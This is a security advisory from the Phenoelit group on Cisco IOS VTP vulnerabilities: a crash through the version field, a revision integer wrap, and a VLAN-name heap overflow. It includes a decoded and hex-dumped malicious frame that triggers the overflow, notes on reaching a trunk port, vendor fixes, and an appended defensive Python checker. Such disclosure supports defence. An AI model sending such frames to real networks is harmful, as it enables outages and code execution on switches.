
Cisco IOS VTP issues



Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +---+>

[ Title ]
        Cisco Systems IOS VTP multiple vulnerabilities

[ Authors ]
        FX              <fx@xxxxxxxxxxxx>

        Phenoelit Group (http://www.phenoelit.de)
        Advisory        http://www.phenoelit.de/stuff/CiscoVTP.txt

[ Affected Products ]
        Cisco IOS and CatOS

        Tested on:      C3550 IOS 12.1(19)

        Cisco Bug ID:   CSCei54611
        CERT Vu ID:     <not assigned>

[ Vendor communication ]
        06.07.05        Initial Notification, gaus@xxxxxxxxx
        12.07.05        PSIRT member Wendy Garvin <wgarvin@xxxxxxxxx>
                        took over
        14.07.05        Wendy states that there is a fix for one of the
                        issues
        19.07.05        According to Wendy, Cisco has trouble reproducing
                        the issues and finding the affected code
        27.07.05        Wendy notifies FX about fixed code
        12.09.06        Phenoelit advisory goes to Cisco (FX just forgot 
                        about it, too much to hack, too little time, but the 
                        PSIRT party in Vegas was a good reminder)
        13.09.06        Final advisory going public as coordinated release

[ Overview ]
        Cisco Systems IOS contains bugs when handling the VLAN
        Trunking Protocol (VTP). Specially crafted packets may cause Denial of
        Service conditions, confusion of the network operator and a heap
        overflow with the possibility for arbitrary code execution.

[ Description ]
        Cisco IOS suffers from several bugs in the VTP handling code. All
        issues require VTP to be in server or client mode. Transparent mode
        (default) is not affected.

        Issue 1: Denial of Service
        When sending a VTP version 1 summary frame to a Cisco IOS device 
        and setting the VTP version field to value 2, the device stops
        working. Apparently, the VTP handling process will loop and is
        terminated by the system's watchdog process, reloading the device.

        Issue 2: Integer wrap in VTP revision
        If an attacker can send VTP updates (summary and sub) to a Cisco IOS
        or CatOS device, he can choose the revision of the VTP information. 
        A revision of 0x7FFFFFFF will be accepted by IOS. When the switch's
        VLAN configuration is changed by an operator, IOS increases the
        revision, which becomes 0x80000000 and seems to be internally
        tracked by a signed integer variable. The revision is therefore
        seen as a large negative value. From this point in time on, the switch
        will not be able to communicate changed VLAN configurations, since 
        the generated updates will be rejected by all other switches.

        Issue 3: VLAN name heap overflow
        If an attacker can send VTP updates to a Cisco IOS device, the 
        type 2 frames contain records for each individual VLAN in the update.
        One field of the VTP records contains the name of the VLAN, another
        field the length of this name. Sending an update with a VLAN name
        above 100 bytes and correctly reflecting the length in the VLAN
        name length field causes a heap overflow. The overflow can be
        exploited to execute arbitrary code on the receiving switch. The 
        maximum length of a VLAN name in VTP is 255 bytes.

[ Example ]
        The following is an example frame for issue 3. The appropriate VTP
        summary advertisement (type 1) must be sent before this frame.

        IEEE 802.3 Ethernet 
            Destination: CDP/VTP (01:00:0c:cc:cc:cc)
            Source: <any>
            Length: 260
        Logical-Link Control
        Virtual Trunking Protocol
            Version: 0x01
            Code: Subset-Advert (0x02)
            Sequence Number: 1
            Management Domain Length: 5
            Management Domain: AAAAA
            Configuration Revision Number: 3
            VLAN Information
                VLAN Information Length: 212
                Status: 0x00
                VLAN Type: Ethernet (0x01)
                VLAN Name Length: 200
                ISL VLAN ID: 0x0001
                MTU Size: 1500
                802.10 Index: 0x000186a1
                VLAN Name: AAAAA[...]AAAAAA (200 in total)
        
        0000  01 00 0c cc cc cc 00 fe fe c0 01 00 01 04 aa aa   ...........^....
        0010  03 00 00 0c 20 03 01 02 01 05 41 41 41 41 41 00   .... .....AAAAA.
        0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
        0030  00 00 00 00 00 00 00 00 00 00 00 00 00 03 d4 00   ................
        0040  01 c8 00 01 05 dc 00 01 86 a1 41 41 41 41 41 41   ..........AAAAAA
        0050  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0060  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0070  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0080  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0090  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00a0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00b0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00c0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00d0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00e0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00f0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0100  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0110  41 41                                             AA

[ Notes ]
        The VTP management domain is needed for the summary advertisement
        to be correct. This information is distributed via CDP if enabled.

        The attacker has to be on a trunk port for VTP frames to be 
        accepted. The Dynamic Trunk Protocol (DTP) can be used to become 
        a trunking peer.

[ Solution ]
        Cisco Systems provides fixed software, which can be found based on
        the following bug IDs:
        CSCsd52629/CSCsd34759 -- VTP version field DoS
        CSCse40078/CSCse47765 -- Integer Wrap in VTP revision
        CSCsd34855/CSCei54611 -- Buffer Overflow in VTP VLAN name

        In general, it is recommended to configure a shared VTP password, 
        which will be used in an MD5 hash to protect the summary 
        advertisement.

[ end of file ($Revision: 1.1 $) ]

-- 
         FX           <fx@xxxxxxxxxxxx>
      Phenoelit   (http://www.phenoelit.de)
672D 64B2 DE42 FCF7 8A5E E43B C0C1 A242 6D63 B564
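
Added example (not part of the Phenoelit advisory and not Cisco or Phenoelit code): a Python check that a monitoring tool could run on captured VTP subset advertisements to flag the conditions behind Issue 2 and Issue 3. The field layout follows the decoded frame in the Example section; the 32-byte name limit, the 4-byte name padding and all function names are assumptions of this example.

```python
import struct

MAX_VLAN_NAME = 32      # assumption: longest VLAN name an operator can configure
REV_LIMIT = 0x7FFFFFFF  # from the advisory: the next increment wraps a signed int

def as_signed32(rev):
    """Reinterpret an unsigned 32-bit revision the way a signed variable sees it."""
    return struct.unpack(">i", struct.pack(">I", rev & 0xFFFFFFFF))[0]

def check_subset_advert(vtp, max_name=MAX_VLAN_NAME):
    """Return findings for one VTP subset advertisement (code 0x02).

    `vtp` is the VTP payload, i.e. the bytes following the LLC/SNAP header.
    """
    if len(vtp) < 40:
        return ["truncated header"]
    _ver, code, _seq, dom_len = vtp[:4]
    if code != 0x02:
        return ["not a subset advertisement"]
    findings = []
    if dom_len > 32:
        findings.append(f"domain length {dom_len} exceeds 32-byte field")
    (rev,) = struct.unpack_from(">I", vtp, 36)
    if rev >= REV_LIMIT:
        findings.append(f"revision 0x{rev:08X}: next increment reads as "
                        f"{as_signed32(rev + 1)} when signed")
    off = 40                                  # first VLAN information record
    while off < len(vtp):
        if len(vtp) - off < 12:
            findings.append(f"record at {off}: truncated")
            break
        info_len, _status, _type, name_len = vtp[off:off + 4]
        (vlan_id,) = struct.unpack_from(">H", vtp, off + 4)
        padded = (name_len + 3) & ~3          # name assumed padded to 4 bytes
        if name_len > max_name:
            findings.append(f"VLAN {vlan_id}: name length {name_len} > {max_name}")
        if info_len < 12 + padded or off + info_len > len(vtp):
            findings.append(f"VLAN {vlan_id}: record length {info_len} inconsistent")
            break                             # cannot locate the next record
        off += info_len
    return findings

def sample_advert(revision, name):
    """Constructed test input: header plus one Ethernet VLAN record (VLAN 1)."""
    padded = name + b"\0" * (-len(name) % 4)
    rec = struct.pack(">BBBBHHI", 12 + len(padded), 0, 1, len(name), 1, 1500, 0x186A1)
    return struct.pack(">BBBB32sI", 1, 2, 1, 5, b"AAAAA", revision) + rec + padded
```

Lowering `max_name` only makes the check stricter; the advisory puts the overflow above 100 bytes, so any limit at or below that covers Issue 3.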